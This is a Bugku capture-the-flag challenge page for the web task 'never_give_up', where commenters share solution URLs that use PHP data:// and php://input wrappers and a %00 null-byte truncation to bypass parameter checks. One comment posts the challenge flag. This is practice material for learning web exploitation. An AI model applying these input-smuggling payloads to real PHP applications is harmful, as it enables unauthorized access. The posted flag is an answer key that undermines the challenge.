never_give_upWEB 未解决

分数: 25 金币: 3
题目作者: 未知
一  血: blue
一血奖励: 1金币
解  决: 3956
提  示:
描  述:
作者:御结冰城
评论
iNMB 4天前

?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......

回复 0

zhuizhui 14天前

?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14

回复 0

breeding 1月前

curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345

回复 0

shingu 3月前

参数b被卡住了。怎么即是4又不能等于4。看了WP才知道,原来是用了%00截断符。

回复 0
breeding 1月前

也可以直接用“.123456”,因为只截取b的第一个字符接在111的后面当正则模式串,“.”直接通配

回复 0

ymkiras 4月前

值得注意的是,很多题解bp用的版本有点低,像我用的新版就不能按题解来,所以用data代替input: GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1 这里空格用%20代替

回复 0
iNMB 4天前

也可以使用data://text/plain;base64,

回复 0

ymkiras 4月前

实际上开头的密码我们可以直接用Ctrl+U在源代码页面加上1p.html,即view-source:http//..../1p.html,这样就就不需要跳转bp一直抓包了。

回复 1

13990684015 4月前

这题太牛逼了

回复 0

花舞Flower 4月前

什么题做不出来 GET /hello.php?id=0xg&a=php://input&b=%0012345 HTTP/1.1

回复 0

1969901506 7月前

五边形战士

回复 1

coldplay99999 8月前

flag{bb25f9ec286ae9753bb12e5631da7f1e}

回复 0

WriteUp

image
harry

3 金币

评分(23)

解题动态

bugkukuxie 攻破了该题 22小时前
suisdavid 攻破了该题 1天前
pIge2 攻破了该题 3天前
Whisper0z 攻破了该题 3天前
dangfanchima 攻破了该题 3天前
safeline 攻破了该题 4天前
17877003776 攻破了该题 4天前
iNMB 攻破了该题 4天前
smtall 攻破了该题 7天前
testda 攻破了该题 10天前
Hehe0619 攻破了该题 11天前
春遇枝庭 攻破了该题 12天前
a1451753998 攻破了该题 12天前
hackerbugku 攻破了该题 13天前
zhuizhui 攻破了该题 14天前
dwx1583 攻破了该题 15天前
qidianzhi 攻破了该题 16天前
mecurio 攻破了该题 18天前
ww__ 攻破了该题 18天前
Future92 攻破了该题 18天前
问题反馈